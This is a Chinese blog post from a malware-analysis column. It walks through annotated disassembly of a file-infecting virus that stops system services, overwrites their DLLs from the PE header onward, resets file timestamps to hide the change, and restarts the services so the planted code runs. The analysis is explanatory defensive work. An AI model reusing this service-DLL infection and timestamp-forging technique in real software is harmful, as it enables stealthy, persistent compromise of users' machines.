病毒常用的方法之同流合污

最新推荐文章于 2021-09-16 22:36:56 发布
最新推荐文章于 2021-09-16 22:36:56 发布
阅读量364 收藏
点赞数
分类专栏: 恶意样本分析 文章标签: 病毒 文件感染
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pureman_mega/article/details/79569611
版权

一些感染型的病毒基本上就是对文件的特性进行了修改(内容,属性等),如果是破坏型的,普通电脑用户也可以辨别出来(烧香的熊猫);还有目的是隐蔽的,一般用户可能就不会那么容易发现从而中招。快捷键病毒将文件夹进行伪造做成一个快捷键,文件夹大小变成1K或2K,图标不变。双击后显示正常的内容,但是恶意程序已经执行了。下面就介绍一个不是那么恶意的病毒它感染文件的关键反汇编代码:

              push    0F003Fh         ;dwDesiredAccess
              push    0               ; lpDatabaseName
              push    0               ; lpMachineName
              call    ds:OpenSCManagerA;打开服务管理器
              mov     [ebp+hSCManager], eax
              and     [ebp+var_254], 0
              and     [ebp+ServiceNum], 0;ServiceNum=0
              jmp     short loc_40110B
loc_4010FE:                                                  
              mov     eax, [ebp+ServiceNum]
              inc     eax
              mov     [ebp+ServiceNum], eax
 loc_40110B:                            
              cmp     [ebp+ServiceNum], 12h ;总共有0x12=18个,都是一些常用的基础服务,都有自己对应的dll文件,会在系统开始的过程中自动加载运行里面提供的服务
              jge     loc_401253
              push    0F01FFh         ; dwDesiredAccess
              mov     eax, [ebp+ServiceNum]
              push    ServiceName[eax*4] ; lpServiceName
              push    [ebp+hSCManager] ; hSCManager
              call    ds:OpenServiceA 
              mov     [ebp+hService], eax
              cmp     [ebp+hService], 0
              jnz     short loc_40113E
              jmp     short loc_4010FE

 loc_40113E:                         
              push    7
              pop     ecx
              xor     eax, eax
              lea     edi, [ebp+ServiceStatus]
              rep stosd
              lea     eax, [ebp+ServiceStatus]
              push    eax             ; lpServiceStatus
              push    [ebp+hService]  ; hService
              call    ds:QueryServiceStatus;查看服务状态
              cmp     [ebp+ServiceStatus.dwCurrentState], 1;SERVICE_CONTROL_STOP ---0x1
              jz      short loc_401197
              cmp     [ebp+var_254], 0
              jnz     short loc_401177
              jmp     loc_401222
              jmp     loc_401222

 loc_401177:                           
              lea     eax, [ebp+ServiceStatus]
              push    eax             ; lpServiceStatus
              push    1               ; dwControl
              push    [ebp+hService]  ; hService
              call    ds:ControlService;如果服务没有停止,设置为停止,方便写入数据但对应的dll中(正在被访问的文件,不能被其他的修改--大概是这个意思)
              test    eax, eax
              jnz     short loc_401197
              jmp     loc_401222 ;操作失败,取释放访问的对象,退出程序 
              jmp     loc_401222

 loc_401197:                                                           
              push    104h            ; Size
              push    0               ; Val
              lea     eax, [ebp+String]
              push    eax             ; Dst
              call    memset
              add     esp, 0Ch
              mov     eax, [ebp+ServiceNum]
              push    DllName[eax*4]
              lea     eax, [ebp+Dst]
              push    eax
              push    offset aSSystem32S ; "%s\\system32\\%s"
              lea     eax, [ebp+String]
              push    eax             ; LPSTR
              call    ds:wsprintfA ;合成路径
              add     esp, 10h
              lea     eax, [ebp+String]
              push    eax             ; pszPath
              call    WriteData ;去写数据
              test    eax, eax
              jnz     short loc_4011EA
              jmp     short loc_401222

              jmp     short loc_401222

 loc_4011EA:                            
              push    0               ; lpServiceArgVectors
              push    0               ; dwNumServiceArgs
              push    [ebp+hService]  ; hService
              call    ds:StartServiceA ;重新开启服务,被写入的代码也会运行
              test    eax, eax
              jnz     short loc_4011FF
              jmp     short loc_401222

WriteData函数对传入的路径进行确认,如果文件存在就从PE文件头开始填写数据(其实也是一个文件,此时从PE文件头开始读入数据);如果文件不存在就创建一个新文件,将数据全部写入。 

FileExist: 
          mov  [ebp+dwCreationDispostion],3
          mov  [ebp+lDistanceToMove],3Ch;是不是很熟悉--e_lfanew 
          jmp  short loc_401538
FileNotExist:
          mov  [ebp+dwCreationDispostion],2
          and  [ebp+lDistanceToMove],0;从头开始
loc_401538:
           push 0  
           push 0
           push [ebp+dwCreationDispostion]
           push 0
           push 0
           push 0C0000000 ;dwDesiredAccess
           push [ebp+pszPath] ;lpFileName
           call ds:CreateFileA ;打开或创建文件
  ;下面再文件的时间上作了手脚,正常情况下文件被修改了,文件上会显示最后改动的时间。它在写入数据之前把上次修改的时间保存下来,数据写入之后把时间该回来
           push 6
           pop  ecx
           xor  eax,eax
           lea  edi,[ebp+CreationTime]
           rep stosd ;初始化CreationTime
           lea  eax,[ebp+LastWriteTime]
           push eax
           lea  eax,[ebp+LastAccessTime]
           push eax
           lea  eax,[ebp+LastCreationTime]
           push eax
           push [ebp+hFile]
           call ds:GetFileTime ;获取文件的一些时间
           cmp     [ebp+dwCreationDisposition], 2
           jnz     short loc_4015AC
           mov     [ebp+CreationTime.dwLowDateTime], 1EC61500h
           mov     [ebp+CreationTime.dwHighDateTime], 1C479C6h
           mov     eax, [ebp+CreationTime.dwLowDateTime]                                                mov     [ebp+LastAccessTime.dwLowDateTime], eax
           mov     eax, [ebp+CreationTime.dwHighDateTime]
           mov     [ebp+LastAccessTime.dwHighDateTime], eax
           mov     eax, [ebp+CreationTime.dwLowDateTime]
           mov     [ebp+LastWriteTime.dwLowDateTime], eax
           mov     eax, [ebp+CreationTime.dwHighDateTime]
           mov     [ebp+LastWriteTime.dwHighDateTime], eax

 loc_4015AC:                                                                                                                                            push    0           ; dwMoveMethod
           push    0       ; lpDistanceToMoveHigh
           push    [ebp+lDistanceToMove] ; lDistanceToMove
           push    [ebp+hFile]     ; hFile
           call    ds:SetFilePointer;设置写入起始点
           mov     eax, hResData ;数据的指针
           add     eax, [ebp+lDistanceToMove];设置读入起始点
           mov     [ebp+lpBuffer], eax
           push    0               ; lpOverlapped
           lea     eax, [ebp+NumberOfBytesWritten]
           push    eax          ; lpNumberOfBytesWritten
           mov     eax, lDistanceToMove
           sub     eax, [ebp+lDistanceToMove]
           push    eax           ; nNumberOfBytesToWrite
           push    [ebp+lpBuffer]  ; lpBuffer
           push    [ebp+hFile]     ; hFile
           call    ds:WriteFile
           test    eax, eax
           jnz     short loc_4015F3
           push    [ebp+hFile]     ; hObject
           call    ds:CloseHandle
pureman_mega
关注
专栏目录
初识二进制与软件破解
d3f4ult的博客
04-03 5015
文章目录简介环境和工具知识铺垫实验 简介 实验的思路来自《0day安全:软件漏洞技术分析》第一章。此次实验的内容为如何破解一个简单的密码验证功能的exe文件。通过此次实验可以大体了解软件破解的一些步骤,为二进制漏洞的学习打下基础认知。 环境和工具 系统环境:windows 10 工具:IDA、OllyDBG、LordPE、uedit64 知识铺垫 实验 1.首先编写一个简单的密码验证的可执行文件。...
病毒分类
ainixi7099的博客
10-12 797
1、木马病毒。木马病毒其前缀是:Trojan,其共有特性以盗取用户信息为目的。2、系统病毒。系统病毒的前缀为:Win32、PE、Win95、W32、W95等。其主要感染windows系统的可执行文件。3、蠕虫病毒。蠕虫病毒的前缀是:Worm。其主要是通过网络或者系统漏洞进行传播4、脚本病毒。脚本病毒的前缀是:Script。其特点是采用脚本语言编写。5、后门病毒。后门病毒的前缀是:Back...
wmighost.dll分析
pureman_mega的博客
12-14 251
这个文件是DLL文件,但是用IDA打开文件后停在了WinMain处,而不是DllMain,并且整个文件里也没有这个函数。既然是DLL文件就先看看导出函数吧。下面是该函数后面一部分: loc_401D2F: ; CODE XREF: start+F7j .text:00401D2F mo
为什么用指针?(20230228更新函数指针使用)
pureman_mega的博客
03-14 5273
相信接触过编程的,大部分应该对C语言有一定了解或者学过一门C语言课程。或多或少听到这种说法:C语言很难学,特别是指针。我大一下学期开的这门课,学完之后感觉还好(其实是我没有深入学,典型的自我感觉良好: )),但指针那块确实也没太弄明白。现在好像明白了一点什么是指针,在什么情况下用比较好。 int a=1;//int* pointer_a=1 在编译会报错 // 'initializing':can
几个字符串函数的实现
pureman_mega的博客
12-21 181
size_t strlen(const char *) ,返回字符串长度 strlen : mov edi,edi push ebp mov ebp,esp xor al,al;al=0 mov edi,dword ptr [ebp+8h] ;目标字符串指针 mov ebx,edi
组织内部沟通方法.doc
10-08
《组织内部沟通方法》 组织内部沟通是任何机构运行的核心,它关乎团队协作效率、员工满意度和企业文化的塑造。在现代企业管理中,良好的沟通能力被认为是员工成功的关键因素之一。本文将探讨组织内部沟通的重要性,...
常用的八字成语大全.docx
03-05
这篇文档汇集的是中文中常用的八字成语,这些成语是中华文化智慧的结晶,蕴含着丰富的哲理和生活经验。以下是一些重要的知识点: 1. **一夫当关,万夫莫开**:形容地势险要,一个人守住关口,众人难以攻破,强调...
公务员考试常用成语300例.docx
11-11
6. 弹冠相庆:源自《汉书·王吉传》,指同僚之间相互庆祝对方升官或得势,多含贬义,表示同流合污。 7. 汗牛充栋:形容藏书众多,用牛运输书籍,牛累得满身大汗,屋里堆满了书。 8. 明日黄花:原指过时的事物,常...
什么是花之四君子.pdf
12-18
如郑思肖以画露根兰表达对故国的怀念和不与统治者同流合污的气节,诗人通过咏兰来表达自己的精神品性。 **三、竹** 竹子以其挺拔劲节的形象和清翠欲滴的色泽,象征着不屈的节操和谦逊的胸怀。竹在风中摇曳的声音和...
爱莲说之的用法,爱莲说的译文.doc
09-14
莲花的香气清幽,虽远犹闻,寓意着其美德深入人心,而其亭亭净植的形象则显示了其不与世俗同流合污的傲骨。 文中将菊花比作隐逸者,牡丹比作富贵者,而莲花则被赋予了君子的美誉。君子在古代中国文化中代表着道德...
socket分包小实验
pureman_mega的博客
08-05 669
当采用最基本socket来传输数据时,如果接受方的缓存去足够大,一次就能保存全部数据;但是当传输的数据比较大(像视频,大文件等),这个时候数据明显需要多次传输。下面是演示将数据分开多次发送的一个例子,分包的关键就是自己设定一套规则,将要发送的数据按照规则组织在一起。有一个要注意的地方:如果发送的数据小于接受方的缓冲区大小,分包就没有意义了;所以接受方缓冲区的大小应该和发送包的最大size相等。 ...
Oracle常用Sql语句
Shorsen的博客
10-25 372
Oracle数据库常用语句使用样例及说明 表级别操作 --创建表有三列,其中userid不能为空 create table test12301( userid number(3) not null, kemu varchar(10), score number(3,1)); --向表test12301增加一列数据 alter table test12301 add beizhu varchar(...
C语言基础知识汇编分析
北冥
03-28 1309
1.静态、动态存储变量的区别 C语言源码: fun() {        int i = 0x100;        static int c = 0x200;        i = c; } 汇编代码: push       bp mov bp, sp push       si mov si, 100h       ;定义动态变量 i = 0x100 mov si, ds:[00
手机病毒的种类介绍
weixin_30760895的博客
05-30 1201
手机病毒病毒形式可以分为四大类: 1.通过“无红传送”蓝牙设备传播的病毒“卡比尔”、“Lasco.A”。 小知识: “卡比尔”( Cabir)是一种网络蠕虫病毒,它可以感染运行“Symbian”操作系统的手机。手机中了该病毒后,使用蓝牙无线功能会对邻近的其它存在漏洞的手机进行扫描,在发现漏洞手机后,病毒就会复制自己并发送到该手机上。 Lasco.A病毒 与蠕虫病毒一样,通过蓝牙无线传播到其它手机...
MFC架构之CWinThread类
热门推荐
FlowShell的专栏
11-14 1万+
      我们知道,Windows以事件驱动方式工作,每个WIN32应用程序都至少包含一个消息队列和一个消息泵。消息队列建立在操作系统提供的内存保留区中,消息泵不断搜寻消息队列,将取得的消息分发给应用程序的各个部分进行处理,这个过程叫做消息循环。基本消息循环如下:while(GetMessage(&msg,0,0,0)) { //转换消息参数 TranslateMesssage(&msg); //分发消息 DispatchMessage(&msg)
网友的语录
pureman_mega的博客
05-13 393
(看到网上的一些比较有意思的文字就抄过来了[偷偷笑]) 一,来自某音乐平台 最残酷的现实的事实是,我们一直在追寻陪伴,但却终于明白灵魂永远是孤独的,再相爱的人也不能在灵魂上同行。---小鹿taylor 唱这首歌一定要涂红唇黑色小礼裙一脸冷艳缓缓摆动臀部一只手扒着话筒一只手在脑袋旁边翘着兰花指才行------muuaaaa 迟言暮雨 玖辛奈:鸣人……不管是好吃的还是不好吃的...
__forceinline 关键字
weixin_30820151的博客
03-31 460
C++提供了内联函数,目的是为了提高函数的执行效率。内联函数在函数声明前面加上关键字inline 就可以了 如:inline int FunctionOne(int x); 在VC++中可使用另一关键字_forceinline 代替inline 关键字.这个关键字将命令编译器跳过一般的ROI 分析(Return On Investment --一种编...
基于ndis protocol driver 后门 分析
pureman_mega的博客
09-16 4458
样本文件MD5: 42f43edc9937e4aa5f985773f5ea9daa 这个样本有点老了,之前分析了一下他的命令执行部分,数据流程一直没有弄明白,现在记录一下。这个样本一上来会通过注册一个临时的 protocol driver (ndis 5.0, 差别多在xp 时代) ;注册成功后会返回一个ndis_handle 指针,然后通过这个指针加上硬编码的偏移找到 tcp/ip protocol driver 的 ndis_handle ,再挂钩(hook) 该结构中的receive 等回调函数;.
简单的键盘按键记录(无码)/虚拟地址转物理地址/生成随机字符串/计算字符串哈希
pureman_mega的博客
06-24 3314
最近看到 一个 样本 ,里面有键盘 按键记录的功能 ,而且 实现也比较 简单,运行 记录 的效果还 不错 。主要思路如下 : //假代码 int i=0; for(i=0;i<0x100;i++) { GetKeyState(i); //参考:https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getkeystate //如果有按键 记录,就去获取一些相关信..
病毒常用方法之注册表操作
pureman_mega的博客
04-03 1206
注册表的增删查改操作基本上是恶意代码的常规操作,但是对注册表的操作通常会留下痕迹,导致被发现,最后被清理掉 .对于驱动模块更是如此,驱动程序的入口函数的第二个参数就是注册表路径,当驱动加载后该值会被写到相应的位置,这是为了隐藏自己,要将与之相关的表项都删掉.下面是一段反汇编代码: int __stdcall DeleteKey(POBJECT_ATTRIBUTES ObjectAttributes)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值